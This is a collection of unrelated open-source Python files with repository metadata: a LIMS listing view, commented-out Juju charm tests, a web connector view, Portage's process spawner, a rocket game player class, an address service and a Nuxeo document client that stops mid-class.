yasir1brahim/OLiMS | lims/controlpanel/bika_containertypes.py | 2 | 3299 | from dependencies.dependency import ClassSecurityInfo
from dependencies.dependency import schemata
from dependencies import atapi
from dependencies.dependency import registerType
from dependencies.dependency import getToolByName
from lims.browser.bika_listing import BikaListingView
from lims.config import PROJECTNAME
from lims import bikaMessageFactory as _
from lims.utils import t
from lims.content.bikaschema import BikaFolderSchema
from lims.interfaces import IContainerTypes
from dependencies.dependency import IViewView
from dependencies.dependency import IFolderContentsView
from dependencies.folder import ATFolder, ATFolderSchema
from dependencies.dependency import implements
from operator import itemgetter
class ContainerTypesView(BikaListingView):
implements(IFolderContentsView, IViewView)
def __init__(self, context, request):
super(ContainerTypesView, self).__init__(context, request)
self.catalog = 'bika_setup_catalog'
self.contentFilter = {'portal_type': 'ContainerType',
'sort_on': 'sortable_title'}
self.context_actions = {_('Add'):
{'url': 'createObject?type_name=ContainerType',
'icon': '++resource++bika.lims.images/add.png'}}
self.title = self.context.translate(_("Container Types"))
self.icon = self.portal_url + "/++resource++bika.lims.images/container_big.png"
self.description = ""
self.show_sort_column = False
self.show_select_row = False
self.show_select_column = True
self.pagesize = 25
self.columns = {
'Title': {'title': _('Container Type'),
'index':'sortable_title'},
'Description': {'title': _('Description'),
'index': 'description',
'toggle': True},
}
self.review_states = [
{'id':'default',
'title': _('Active'),
'contentFilter': {'inactive_state': 'active'},
'transitions': [{'id':'deactivate'}, ],
'columns': ['Title',
'Description']},
{'id':'inactive',
'title': _('Dormant'),
'contentFilter': {'inactive_state': 'inactive'},
'transitions': [{'id':'activate'}, ],
'columns': ['Title',
'Description']},
{'id':'all',
'title': _('All'),
'contentFilter':{},
'columns': ['Title',
'Description']},
]
def folderitems(self):
items = BikaListingView.folderitems(self)
for x in range(len(items)):
if not items[x].has_key('obj'): continue
obj = items[x]['obj']
items[x]['Description'] = obj.Description()
items[x]['replace']['Title'] = "<a href='%s'>%s</a>" % \
(items[x]['url'], items[x]['Title'])
return items
schema = ATFolderSchema.copy()
class ContainerTypes(ATFolder):
implements(IContainerTypes)
displayContentsTab = False
schema = schema
schemata.finalizeATCTSchema(schema, folderish = True, moveDiscussion = False)
atapi.registerType(ContainerTypes, PROJECTNAME)
| agpl-3.0 | 1,310,875,499,270,571,800 | 37.360465 | 87 | 0.588057 | false | 4.43414 | false | false | false |
LuisAlejandro/tribus | tribus/common/charms/tests/test_directory.py | 2 | 9024 | # import gc
# import os
# import hashlib
# import inspect
# import shutil
# import zipfile
# from juju.errors import CharmError, FileNotFound
# from juju.charm.errors import InvalidCharmFile
# from juju.charm.metadata import MetaData
# from juju.charm.directory import CharmDirectory
# from juju.charm.bundle import CharmBundle
# from juju.lib import serializer
# from juju.lib.filehash import compute_file_hash
# from juju.charm import tests
# from juju.charm.tests.test_repository import RepositoryTestBase
# sample_directory = os.path.join(
# os.path.dirname(
# inspect.getabsfile(tests)), "repository", "series", "dummy")
# class DirectoryTest(RepositoryTestBase):
# def setUp(self):
# super(DirectoryTest, self).setUp()
# # Ensure the empty/ directory exists under the dummy sample
# # charm. Depending on how the source code is exported,
# # empty directories may be ignored.
# empty_dir = os.path.join(sample_directory, "empty")
# if not os.path.isdir(empty_dir):
# os.mkdir(empty_dir)
# def copy_charm(self):
# dir_ = os.path.join(self.makeDir(), "sample")
# shutil.copytree(sample_directory, dir_)
# return dir_
# def delete_revision(self, dir_):
# os.remove(os.path.join(dir_, "revision"))
# def set_metadata_revision(self, dir_, revision):
# metadata_path = os.path.join(dir_, "metadata.yaml")
# with open(metadata_path) as f:
# data = serializer.yaml_load(f.read())
# data["revision"] = 999
# with open(metadata_path, "w") as f:
# f.write(serializer.yaml_dump(data))
# def test_metadata_is_required(self):
# directory = self.makeDir()
# self.assertRaises(FileNotFound, CharmDirectory, directory)
# def test_no_revision(self):
# dir_ = self.copy_charm()
# self.delete_revision(dir_)
# charm = CharmDirectory(dir_)
# self.assertEquals(charm.get_revision(), 0)
# with open(os.path.join(dir_, "revision")) as f:
# self.assertEquals(f.read(), "0\n")
# def test_nonsense_revision(self):
# dir_ = self.copy_charm()
# with open(os.path.join(dir_, "revision"), "w") as f:
# f.write("shifty look")
# err = self.assertRaises(CharmError, CharmDirectory, dir_)
# self.assertEquals(
# str(err),
# "Error processing %r: invalid charm revision 'shifty look'" % dir_)
# def test_revision_in_metadata(self):
# dir_ = self.copy_charm()
# self.delete_revision(dir_)
# self.set_metadata_revision(dir_, 999)
# log = self.capture_logging("juju.charm")
# charm = CharmDirectory(dir_)
# self.assertEquals(charm.get_revision(), 999)
# self.assertIn(
# "revision field is obsolete. Move it to the 'revision' file.",
# log.getvalue())
# def test_competing_revisions(self):
# dir_ = self.copy_charm()
# self.set_metadata_revision(dir_, 999)
# log = self.capture_logging("juju.charm")
# charm = CharmDirectory(dir_)
# self.assertEquals(charm.get_revision(), 1)
# self.assertIn(
# "revision field is obsolete. Move it to the 'revision' file.",
# log.getvalue())
# def test_set_revision(self):
# dir_ = self.copy_charm()
# charm = CharmDirectory(dir_)
# charm.set_revision(123)
# self.assertEquals(charm.get_revision(), 123)
# with open(os.path.join(dir_, "revision")) as f:
# self.assertEquals(f.read(), "123\n")
# def test_info(self):
# directory = CharmDirectory(sample_directory)
# self.assertTrue(directory.metadata is not None)
# self.assertTrue(isinstance(directory.metadata, MetaData))
# self.assertEquals(directory.metadata.name, "dummy")
# self.assertEquals(directory.type, "dir")
# def test_make_archive(self):
# # make archive from sample directory
# directory = CharmDirectory(sample_directory)
# f = self.makeFile(suffix=".charm")
# directory.make_archive(f)
# # open archive in .zip-format and assert integrity
# from zipfile import ZipFile
# zf = ZipFile(f)
# self.assertEqual(zf.testzip(), None)
# # assert included
# included = [info.filename for info in zf.infolist()]
# self.assertEqual(
# set(included),
# set(("metadata.yaml", "empty/", "src/", "src/hello.c",
# "config.yaml", "hooks/", "hooks/install", "revision")))
# def test_as_bundle(self):
# directory = CharmDirectory(self.sample_dir1)
# charm_bundle = directory.as_bundle()
# self.assertEquals(type(charm_bundle), CharmBundle)
# self.assertEquals(charm_bundle.metadata.name, "sample")
# self.assertIn("sample-1.charm", charm_bundle.path)
# total_compressed = 0
# total_uncompressed = 0
# zip_file = zipfile.ZipFile(charm_bundle.path)
# for n in zip_file.namelist():
# info = zip_file.getinfo(n)
# total_compressed += info.compress_size
# total_uncompressed += info.file_size
# self.assertTrue(total_compressed < total_uncompressed)
# def test_as_bundle_file_lifetime(self):
# """
# The temporary bundle file created should have a life time
# equivalent to that of the directory object itself.
# """
# directory = CharmDirectory(self.sample_dir1)
# charm_bundle = directory.as_bundle()
# gc.collect()
# self.assertTrue(os.path.isfile(charm_bundle.path))
# del directory
# gc.collect()
# self.assertFalse(os.path.isfile(charm_bundle.path))
# def test_compute_sha256(self):
# """
# Computing the sha256 of a directory will use the bundled
# charm, since the hash of the file itself is needed.
# """
# directory = CharmDirectory(self.sample_dir1)
# sha256 = directory.compute_sha256()
# charm_bundle = directory.as_bundle()
# self.assertEquals(type(charm_bundle), CharmBundle)
# self.assertEquals(compute_file_hash(hashlib.sha256,
# charm_bundle.path),
# sha256)
# def test_as_bundle_with_relative_path(self):
# """
# Ensure that as_bundle works correctly with relative paths.
# """
# current_dir = os.getcwd()
# os.chdir(self.sample_dir2)
# self.addCleanup(os.chdir, current_dir)
# charm_dir = "../%s" % os.path.basename(self.sample_dir1)
# directory = CharmDirectory(charm_dir)
# charm_bundle = directory.as_bundle()
# self.assertEquals(type(charm_bundle), CharmBundle)
# self.assertEquals(charm_bundle.metadata.name, "sample")
# def test_charm_base_inheritance(self):
# """
# get_sha256() should be implemented in the base class,
# and should use compute_sha256 to calculate the digest.
# """
# directory = CharmDirectory(self.sample_dir1)
# bundle = directory.as_bundle()
# digest = compute_file_hash(hashlib.sha256, bundle.path)
# self.assertEquals(digest, directory.get_sha256())
# def test_as_directory(self):
# directory = CharmDirectory(self.sample_dir1)
# self.assertIs(directory.as_directory(), directory)
# def test_config(self):
# """Validate that ConfigOptions are available on the charm"""
# from juju.charm.tests.test_config import sample_yaml_data
# directory = CharmDirectory(sample_directory)
# self.assertEquals(directory.config.get_serialization_data(),
# sample_yaml_data)
# def test_file_type(self):
# charm_dir = self.copy_charm()
# os.mkfifo(os.path.join(charm_dir, "foobar"))
# directory = CharmDirectory(charm_dir)
# e = self.assertRaises(InvalidCharmFile, directory.as_bundle)
# self.assertIn("foobar' Invalid file type for a charm", str(e))
# def test_internal_symlink(self):
# charm_path = self.copy_charm()
# external_file = self.makeFile(content='baz')
# os.symlink(external_file, os.path.join(charm_path, "foobar"))
# directory = CharmDirectory(charm_path)
# e = self.assertRaises(InvalidCharmFile, directory.as_bundle)
# self.assertIn("foobar' Absolute links are invalid", str(e))
# def test_extract_symlink(self):
# charm_path = self.copy_charm()
# external_file = self.makeFile(content='lorem ipsum')
# os.symlink(external_file, os.path.join(charm_path, "foobar"))
# directory = CharmDirectory(charm_path)
# e = self.assertRaises(InvalidCharmFile, directory.as_bundle)
# self.assertIn("foobar' Absolute links are invalid", str(e))
| gpl-3.0 | 4,949,863,388,452,353,000 | 38.578947 | 81 | 0.607602 | false | 3.403998 | true | false | false |
ecreall/nova-ideo | novaideo/connectors/google/views/create.py | 1 | 1201 | # Copyright (c) 2014 by Ecreall under licence AGPL terms
# avalaible on http://www.gnu.org/licenses/agpl.html
# licence: AGPL
# author: Amen Souissi
from pyramid.view import view_config
from dace.processinstance.core import DEFAULTMAPPING_ACTIONS_VIEWS
from pontus.default_behavior import Cancel
from pontus.form import FormView
from pontus.schema import select
from novaideo.connectors.google.content.behaviors import CreateConnector
from novaideo.connectors.google import GoogleConnectorSchema, GoogleConnector
from novaideo.content.novaideo_application import NovaIdeoApplication
from novaideo import _
@view_config(
name='creategoogleconnector',
context=NovaIdeoApplication,
renderer='pontus:templates/views_templates/grid.pt',
)
class CreateGoogleConnectorView(FormView):
title = _('Add a Google connector')
schema = select(GoogleConnectorSchema(factory=GoogleConnector, editable=True),
['auth_conf'])
behaviors = [CreateConnector, Cancel]
formid = 'formcreategoogleconnector'
name = 'creategoogleconnector'
css_class = 'panel-transparent'
DEFAULTMAPPING_ACTIONS_VIEWS.update(
{CreateConnector: CreateGoogleConnectorView})
| agpl-3.0 | 4,830,485,414,524,612,000 | 31.459459 | 82 | 0.777685 | false | 3.788644 | false | false | false |
devurandom/portage | pym/_emerge/SpawnProcess.py | 1 | 6588 | # Copyright 1999-2012 Gentoo Foundation
# Distributed under the terms of the GNU General Public License v2
from _emerge.SubProcess import SubProcess
import sys
from portage.cache.mappings import slot_dict_class
import portage
from portage import _encodings
from portage import _unicode_encode
from portage import os
from portage.const import BASH_BINARY
import fcntl
import errno
import gzip
class SpawnProcess(SubProcess):
"""
Constructor keyword args are passed into portage.process.spawn().
The required "args" keyword argument will be passed as the first
spawn() argument.
"""
_spawn_kwarg_names = ("env", "opt_name", "fd_pipes",
"uid", "gid", "groups", "umask", "logfile",
"path_lookup", "pre_exec")
__slots__ = ("args",) + \
_spawn_kwarg_names + ("_log_file_real", "_selinux_type",)
_file_names = ("log", "process", "stdout")
_files_dict = slot_dict_class(_file_names, prefix="")
def _start(self):
if self.fd_pipes is None:
self.fd_pipes = {}
fd_pipes = self.fd_pipes
self._files = self._files_dict()
files = self._files
master_fd, slave_fd = self._pipe(fd_pipes)
fcntl.fcntl(master_fd, fcntl.F_SETFL,
fcntl.fcntl(master_fd, fcntl.F_GETFL) | os.O_NONBLOCK)
files.process = master_fd
logfile = None
if self._can_log(slave_fd):
logfile = self.logfile
null_input = None
if not self.background or 0 in fd_pipes:
# Subclasses such as AbstractEbuildProcess may have already passed
# in a null file descriptor in fd_pipes, so use that when given.
pass
else:
# TODO: Use job control functions like tcsetpgrp() to control
# access to stdin. Until then, use /dev/null so that any
# attempts to read from stdin will immediately return EOF
# instead of blocking indefinitely.
null_input = os.open('/dev/null', os.O_RDWR)
fd_pipes[0] = null_input
fd_pipes.setdefault(0, sys.__stdin__.fileno())
fd_pipes.setdefault(1, sys.__stdout__.fileno())
fd_pipes.setdefault(2, sys.__stderr__.fileno())
# flush any pending output
stdout_filenos = (sys.__stdout__.fileno(), sys.__stderr__.fileno())
for fd in fd_pipes.values():
if fd in stdout_filenos:
sys.__stdout__.flush()
sys.__stderr__.flush()
break
if logfile is not None:
fd_pipes_orig = fd_pipes.copy()
fd_pipes[1] = slave_fd
fd_pipes[2] = slave_fd
files.log = open(_unicode_encode(logfile,
encoding=_encodings['fs'], errors='strict'), mode='ab')
if logfile.endswith('.gz'):
self._log_file_real = files.log
files.log = gzip.GzipFile(filename='', mode='ab',
fileobj=files.log)
portage.util.apply_secpass_permissions(logfile,
uid=portage.portage_uid, gid=portage.portage_gid,
mode=0o660)
if not self.background:
files.stdout = os.dup(fd_pipes_orig[1])
output_handler = self._output_handler
else:
# Create a dummy pipe so the scheduler can monitor
# the process from inside a poll() loop.
fd_pipes[self._dummy_pipe_fd] = slave_fd
if self.background:
fd_pipes[1] = slave_fd
fd_pipes[2] = slave_fd
output_handler = self._dummy_handler
kwargs = {}
for k in self._spawn_kwarg_names:
v = getattr(self, k)
if v is not None:
kwargs[k] = v
kwargs["fd_pipes"] = fd_pipes
kwargs["returnpid"] = True
kwargs.pop("logfile", None)
self._reg_id = self.scheduler.register(files.process,
self._registered_events, output_handler)
self._registered = True
retval = self._spawn(self.args, **kwargs)
os.close(slave_fd)
if null_input is not None:
os.close(null_input)
if isinstance(retval, int):
# spawn failed
self._unregister()
self._set_returncode((self.pid, retval))
self.wait()
return
self.pid = retval[0]
portage.process.spawned_pids.remove(self.pid)
def _can_log(self, slave_fd):
return True
def _pipe(self, fd_pipes):
"""
@type fd_pipes: dict
@param fd_pipes: pipes from which to copy terminal size if desired.
"""
return os.pipe()
def _spawn(self, args, **kwargs):
spawn_func = portage.process.spawn
if self._selinux_type is not None:
spawn_func = portage.selinux.spawn_wrapper(spawn_func,
self._selinux_type)
# bash is an allowed entrypoint, while most binaries are not
if args[0] != BASH_BINARY:
args = [BASH_BINARY, "-c", "exec \"$@\"", args[0]] + args
return spawn_func(args, **kwargs)
def _output_handler(self, fd, event):
files = self._files
while True:
buf = self._read_buf(fd, event)
if buf is None:
# not a POLLIN event, EAGAIN, etc...
break
if not buf:
# EOF
self._unregister()
self.wait()
break
else:
if not self.background:
write_successful = False
failures = 0
while True:
try:
if not write_successful:
os.write(files.stdout, buf)
write_successful = True
break
except OSError as e:
if e.errno != errno.EAGAIN:
raise
del e
failures += 1
if failures > 50:
# Avoid a potentially infinite loop. In
# most cases, the failure count is zero
# and it's unlikely to exceed 1.
raise
# This means that a subprocess has put an inherited
# stdio file descriptor (typically stdin) into
# O_NONBLOCK mode. This is not acceptable (see bug
# #264435), so revert it. We need to use a loop
# here since there's a race condition due to
# parallel processes being able to change the
# flags on the inherited file descriptor.
# TODO: When possible, avoid having child processes
# inherit stdio file descriptors from portage
# (maybe it can't be avoided with
# PROPERTIES=interactive).
fcntl.fcntl(files.stdout, fcntl.F_SETFL,
fcntl.fcntl(files.stdout,
fcntl.F_GETFL) ^ os.O_NONBLOCK)
files.log.write(buf)
files.log.flush()
self._unregister_if_appropriate(event)
return True
def _dummy_handler(self, fd, event):
"""
This method is mainly interested in detecting EOF, since
the only purpose of the pipe is to allow the scheduler to
monitor the process from inside a poll() loop.
"""
while True:
buf = self._read_buf(fd, event)
if buf is None:
# not a POLLIN event, EAGAIN, etc...
break
if not buf:
# EOF
self._unregister()
self.wait()
break
self._unregister_if_appropriate(event)
return True
def _unregister(self):
super(SpawnProcess, self)._unregister()
if self._log_file_real is not None:
# Avoid "ResourceWarning: unclosed file" since python 3.2.
self._log_file_real.close()
self._log_file_real = None
| gpl-2.0 | -7,758,191,856,039,773,000 | 25.457831 | 69 | 0.656952 | false | 3.181072 | false | false | false |
markusd/rocket | rocket/player.py | 1 | 4137 | import math
import copy
import json
from OpenGL.GL import *
from Box2D import *
from utils.opengl import *
from utils import *
from rocket.object import Missile
class Player():
def __init__(self, keyAdapter, mouse, world, level, position):
self.keyAdapter = keyAdapter
self.world = world
self.level = level
self.mouse = mouse
self.fuel = 500.0
self.possessions = []
self.rockets = 100
self.elapsed_since_rocket = 0
w = 1.0
h = 2.5
self.body = self.world.CreateDynamicBody(
position=position,
userData=self,
fixtures=b2FixtureDef(
#shape=b2PolygonShape(box=(1.0, 1.5)),
shape=b2PolygonShape(vertices=[(-1, -1.5), (1, -1.5), (1, 0), (0, 1.5), (-1, 0)]),
density=1,
angularDamping=50,
friction=5,
#linearDamping=0.1,
)
)
w*=2.5
h*=1.5
self.size = [([0.0, 1.0], [-w*0.5, h*0.5]),
([0.0, 0.0], [-w*0.5, -h*0.5-1]),
([1.0, 0.0], [ w*0.5, -h*0.5-1]),
([1.0, 1.0], [ w*0.5, h*0.5])]
self.wasRotating = False
def update(self, dt):
pressed = lambda x: x in self.keyAdapter.pressed
self.elapsed_since_rocket += dt
if pressed("right") or pressed("d"):
if abs(self.body.angularVelocity) <= 3.0:
self.body.ApplyAngularImpulse(-5.0, True)
self.wasRotating = True
elif pressed("left") or pressed("a"):
if abs(self.body.angularVelocity) <= 3.0:
self.body.ApplyAngularImpulse(5.0, True)
self.wasRotating = True
elif self.wasRotating:
self.body.angularVelocity = 0
self.wasRotating = False
if self.fuel > 0.0 and (pressed("up") or pressed("w")):
if pressed("shift"):
f = self.body.GetWorldVector(localVector=(0.0, 500.0*0.5))
self.fuel -= 3 * dt
else:
f = self.body.GetWorldVector(localVector=(0.0, 100.0*0.5))
self.fuel -= 1 * dt
p = self.body.GetWorldPoint(localPoint=(0.0, 0.0))
self.body.ApplyForce(f, p, True)
self.fuel = max(0.0, self.fuel)
if pressed(" ") and self.elapsed_since_rocket > 1.0 and self.rockets > 0:
self.rockets -= 1
self.elapsed_since_rocket = 0
position = self.body.transform.position
#dir = Vec2d(0.0, 1.0)
#dir.rotate(self.body.transform.angle * 180.0/3.14)
#dir = b2Vec2(dir.x, dir.y)
target = self.mouse["wpos"]()
target = b2Vec2(target[0], target[1])
dir = target - position
dir.Normalize()
position = position + dir * 3
missile = Missile.launch(world=self.world, target=None, position=position, velocity=dir * 50)
self.level.objects.append(missile)
def render(self):
pressed = lambda x: x in self.keyAdapter.pressed
texture = "textures/rocket-idle"
if pressed("up") or pressed("left") or pressed("right") or pressed("a") or pressed("w") or pressed("d"):
texture = "textures/rocket"
if pressed("shift"):
texture = "textures/rocket-afterburner"
glColor3f(1.0, 1.0, 1.0)
TextureManager.instance()[texture].bind()
glEnable(GL_BLEND)
glBlendFunc(GL_SRC_ALPHA, GL_ONE_MINUS_SRC_ALPHA)
glEnable(GL_TEXTURE_2D)
glPushMatrix()
glTranslatef(self.body.transform.position.x, self.body.transform.position.y, 0.0)
glRotatef(self.body.transform.angle * 180.0/3.14, 0.0, 0.0, 1.0)
glBegin(GL_QUADS)
for v in self.size:
glTexCoord2fv(v[0]) ; glVertex2fv(v[1])
glEnd()
glPopMatrix()
glDisable(GL_TEXTURE_2D)
| bsd-2-clause | 4,728,756,581,301,402,000 | 32.918033 | 112 | 0.510273 | false | 3.427506 | false | false | false |
jstoja/TsinghuaMailSystem | src/com/mailsystem/services/AddressService.py | 1 | 1110 | '''
Created on 8 juin 2014
@author: Romain
'''
from src.com.mailsystem.orm import Address
class AddressService:
@staticmethod
def listAll(db_users):
s = db_users.session()
ret = s.query(Address).all()
s.close()
return ret
@staticmethod
def selectById(db_users, idadd):
s = db_users.session()
ret = s.query(Address).get(idadd)
s.close()
return ret
@staticmethod
def add(db_users, name):
insertStatement = db_users.statement(Address, "insert")\
.values(name = name)
result = db_users.execute(insertStatement)
if result is not None:
return result.inserted_primary_key[0]
return -1
@staticmethod
def update(db_users, idadd, name):
updateStatement = db_users.statement(Address, "update")\
.where(Address.__table__.c.idaddress == idadd)\
.values(name = name)
result = db_user.execute(updateStatement)
return result is not None | mit | -988,518,705,082,188,700 | 27.487179 | 83 | 0.552252 | false | 4.157303 | false | false | false |
ssdi-drive/nuxeo-drive | nuxeo-drive-client/nxdrive/client/remote_document_client.py | 1 | 19921 | # coding: utf-8
""" API to access remote Nuxeo documents for synchronization. """
import os
import unicodedata
import urllib2
from collections import namedtuple
from datetime import datetime
from dateutil import parser
from nxdrive.client.base_automation_client import BaseAutomationClient
from nxdrive.client.common import NotFound, safe_filename
from nxdrive.logging_config import get_logger
from nxdrive.options import Options
log = get_logger(__name__)
# Make the following an optional binding configuration
FILE_TYPE = 'File'
FOLDER_TYPE = 'Folder'
DEFAULT_TYPES = ('File', 'Note', 'Workspace', 'Folder')
MAX_CHILDREN = 1000
# Data transfer objects
BaseNuxeoDocumentInfo = namedtuple('NuxeoDocumentInfo', [
'root', # ref of the document that serves as sync root
'name', # title of the document (not guaranteed to be locally unique)
'uid', # ref of the document
'parent_uid', # ref of the parent document
'path', # remote path (useful for ordering)
'folderish', # True is can host child documents
'last_modification_time', # last update time
'last_contributor', # last contributor
'digest_algorithm', # digest algorithm of the document's blob
'digest', # digest of the document's blob
'repository', # server repository name
'doc_type', # Nuxeo document type
'version', # Nuxeo version
'state', # Nuxeo lifecycle state
'has_blob', # If this doc has blob
'filename', # Filename of document
'lock_owner', # lock owner
'lock_created', # lock creation time
'permissions', # permissions
])
class NuxeoDocumentInfo(BaseNuxeoDocumentInfo):
"""Data Transfer Object for doc info on the Remote Nuxeo repository"""
# Consistency with the local client API
def get_digest(self):
return self.digest
class RemoteDocumentClient(BaseAutomationClient):
"""Nuxeo document oriented Automation client
Uses Automation standard document API. Deprecated in NuxeDrive
since now using FileSystemItem API.
Kept here for tests and later extraction of a generic API.
"""
# Override constructor to initialize base folder
# which is specific to RemoteDocumentClient
def __init__(self, server_url, user_id, device_id, client_version,
proxies=None, proxy_exceptions=None,
password=None, token=None, repository=Options.remote_repo,
base_folder=None, timeout=20, blob_timeout=None,
cookie_jar=None, upload_tmp_dir=None, check_suspended=None):
super(RemoteDocumentClient, self).__init__(
server_url, user_id, device_id, client_version,
proxies=proxies, proxy_exceptions=proxy_exceptions,
password=password, token=token, repository=repository,
timeout=timeout, blob_timeout=blob_timeout,
cookie_jar=cookie_jar, upload_tmp_dir=upload_tmp_dir,
check_suspended=check_suspended)
# fetch the root folder ref
self.set_base_folder(base_folder)
def set_base_folder(self, base_folder):
if base_folder is not None:
base_folder_doc = self.fetch(base_folder)
self._base_folder_ref = base_folder_doc['uid']
self._base_folder_path = base_folder_doc['path']
else:
self._base_folder_ref, self._base_folder_path = None, None
#
# API common with the local client API
#
def get_info(self, ref, raise_if_missing=True, fetch_parent_uid=True,
use_trash=True, include_versions=False):
if not self.exists(ref, use_trash=use_trash,
include_versions=include_versions):
if raise_if_missing:
raise NotFound("Could not find '%s' on '%s'" % (
self._check_ref(ref), self.server_url))
return None
return self.doc_to_info(self.fetch(self._check_ref(ref)),
fetch_parent_uid=fetch_parent_uid)
def get_content(self, ref):
"""
Download and return the binary content of a document
Beware that the content is loaded in memory.
"""
if not isinstance(ref, NuxeoDocumentInfo):
ref = self._check_ref(ref)
return self.get_blob(ref)
# TODO: allow getting content by streaming the response to an output file
# See RemoteFileSystemClient.stream_content
def get_children_info(self, ref, types=DEFAULT_TYPES, limit=MAX_CHILDREN):
ref = self._check_ref(ref)
query = (
"SELECT * FROM Document"
" WHERE ecm:parentId = '%s'"
" AND ecm:primaryType IN ('%s')"
" AND ecm:currentLifeCycleState != 'deleted'"
" AND ecm:isCheckedInVersion = 0"
" ORDER BY dc:title, dc:created LIMIT %d"
) % (ref, "', '".join(types), limit)
entries = self.query(query)[u'entries']
if len(entries) == MAX_CHILDREN:
# TODO: how to best handle this case? A warning and return an empty
# list, a dedicated exception?
raise RuntimeError("Folder %r on server %r has more than the"
"maximum number of children: %d" % (
ref, self.server_url, MAX_CHILDREN))
return self._filtered_results(entries)
def make_folder(self, parent, name, doc_type=FOLDER_TYPE):
# TODO: make it possible to configure context dependent:
# - SocialFolder under SocialFolder or SocialWorkspace
# - Folder under Folder or Workspace
# This configuration should be provided by a special operation on the
# server.
parent = self._check_ref(parent)
doc = self.create(parent, doc_type, name=name,
properties={'dc:title': name})
return doc[u'uid']
def make_file(self, parent, name, content=None, doc_type=FILE_TYPE):
"""Create a document of the given type with the given name and content
Creates a temporary file from the content then streams it.
"""
parent = self._check_ref(parent)
properties = {'dc:title': name}
if doc_type is 'Note' and content is not None:
properties['note:note'] = content
doc = self.create(parent, doc_type, name=name, properties=properties)
ref = doc[u'uid']
if doc_type is not 'Note' and content is not None:
self.attach_blob(ref, content, name)
return ref
def stream_file(self, parent, name, file_path, filename=None,
mime_type=None, doc_type=FILE_TYPE):
"""Create a document by streaming the file with the given path"""
ref = self.make_file(parent, name, doc_type=doc_type)
self.execute_with_blob_streaming("Blob.Attach", file_path,
filename=filename, document=ref,
mime_type=mime_type)
return ref
def update_content(self, ref, content, filename=None):
"""Update a document with the given content
Creates a temporary file from the content then streams it.
"""
if filename is None:
filename = self.get_info(ref).name
self.attach_blob(self._check_ref(ref), content, filename)
def stream_update(
self,
ref,
file_path,
filename=None,
mime_type=None,
apply_versioning_policy=False,
):
"""Update a document by streaming the file with the given path"""
ref = self._check_ref(ref)
op_name = ('NuxeoDrive.AttachBlob'
if self.is_nuxeo_drive_attach_blob()
else 'Blob.Attach')
params = {'document': ref}
if self.is_nuxeo_drive_attach_blob():
params.update({'applyVersioningPolicy': apply_versioning_policy})
self.execute_with_blob_streaming(
op_name, file_path, filename=filename, mime_type=mime_type, **params)
def delete(self, ref, use_trash=True):
op_input = "doc:" + self._check_ref(ref)
if use_trash:
try:
return self.execute("Document.SetLifeCycle", op_input=op_input,
value='delete')
except urllib2.HTTPError as e:
if e.code == 500:
return self.execute("Document.Delete", op_input=op_input)
raise
else:
return self.execute("Document.Delete", op_input=op_input)
def undelete(self, ref):
op_input = "doc:" + self._check_ref(ref)
return self.execute("Document.SetLifeCycle", op_input=op_input,
value='undelete')
def delete_content(self, ref, xpath=None):
return self.delete_blob(self._check_ref(ref), xpath=xpath)
def exists(self, ref, use_trash=True, include_versions=False):
# type: (unicode, bool, bool) -> bool
"""
Check if a document exists on the server.
:param ref: Document reference (UID).
:param use_trash: Filter documents inside the trash.
:param include_versions:
:rtype: bool
"""
ref = self._check_ref(ref)
id_prop = 'ecm:path' if ref.startswith('/') else 'ecm:uuid'
if use_trash:
lifecyle_pred = "AND ecm:currentLifeCycleState != 'deleted'"
else:
lifecyle_pred = ""
if include_versions:
version_pred = ""
else:
version_pred = "AND ecm:isCheckedInVersion = 0"
query = ("SELECT * FROM Document WHERE %s = '%s' %s %s"
" LIMIT 1") % (
id_prop, ref, lifecyle_pred, version_pred)
results = self.query(query)
return len(results[u'entries']) == 1
def check_writable(self, ref):
# TODO: which operation can be used to perform a permission check?
return True
def _check_ref(self, ref):
if ref.startswith('/') and self._base_folder_path is not None:
# This is a path ref (else an id ref)
if self._base_folder_path.endswith('/'):
ref = self._base_folder_path + ref[1:]
else:
ref = self._base_folder_path + ref
return ref
def doc_to_info(self, doc, fetch_parent_uid=True, parent_uid=None):
"""Convert Automation document description to NuxeoDocumentInfo"""
props = doc['properties']
name = props['dc:title']
filename = None
folderish = 'Folderish' in doc['facets']
try:
last_update = datetime.strptime(doc['lastModified'],
"%Y-%m-%dT%H:%M:%S.%fZ")
except ValueError:
# no millisecond?
last_update = datetime.strptime(doc['lastModified'],
"%Y-%m-%dT%H:%M:%SZ")
last_contributor = props['dc:lastContributor']
# TODO: support other main files
has_blob = False
if folderish:
digest_algorithm = None
digest = None
else:
blob = props.get('file:content')
if blob is None:
note = props.get('note:note')
if note is None:
digest_algorithm = None
digest = None
else:
import hashlib
m = hashlib.md5()
m.update(note.encode('utf-8'))
digest = m.hexdigest()
digest_algorithm = 'md5'
ext = '.txt'
mime_type = props.get('note:mime_type')
if mime_type == 'text/html':
ext = '.html'
elif mime_type == 'text/xml':
ext = '.xml'
elif mime_type == 'text/x-web-markdown':
ext = '.md'
if not name.endswith(ext):
filename = name + ext
else:
filename = name
else:
has_blob = True
digest_algorithm = blob.get('digestAlgorithm')
if digest_algorithm is not None:
digest_algorithm = digest_algorithm.lower().replace('-', '')
digest = blob.get('digest')
filename = blob.get('name')
# Lock info
lock_owner = doc.get('lockOwner')
lock_created = doc.get('lockCreated')
if lock_created is not None:
lock_created = parser.parse(lock_created)
# Permissions
permissions = doc.get('contextParameters', {}).get('permissions', None)
# XXX: we need another roundtrip just to fetch the parent uid...
if parent_uid is None and fetch_parent_uid:
parent_uid = self.fetch(os.path.dirname(doc['path']))['uid']
# Normalize using NFC to make the tests more intuitive
if 'uid:major_version' in props and 'uid:minor_version' in props:
version = str(props['uid:major_version']) + '.' + str(props['uid:minor_version'])
else:
version = None
if name is not None:
name = unicodedata.normalize('NFC', name)
return NuxeoDocumentInfo(
self._base_folder_ref, name, doc['uid'], parent_uid,
doc['path'], folderish, last_update, last_contributor,
digest_algorithm, digest, self.repository, doc['type'],
version, doc['state'], has_blob, filename,
lock_owner, lock_created, permissions)
def _filtered_results(self, entries, fetch_parent_uid=True,
parent_uid=None):
# Filter out filenames that would be ignored by the file system client
# so as to be consistent.
filtered = []
for info in [self.doc_to_info(d, fetch_parent_uid=fetch_parent_uid,
parent_uid=parent_uid)
for d in entries]:
name = info.name.lower()
if (name.endswith(Options.ignored_suffixes)
or name.startswith(Options.ignored_prefixes)):
continue
filtered.append(info)
return filtered
#
# Generic Automation features reused from nuxeolib
#
# Document category
def create(self, ref, doc_type, name=None, properties=None):
name = safe_filename(name)
return self.execute("Document.Create", op_input="doc:" + ref,
type=doc_type, name=name, properties=properties)
def update(self, ref, properties=None):
return self.execute("Document.Update", op_input="doc:" + ref,
properties=properties)
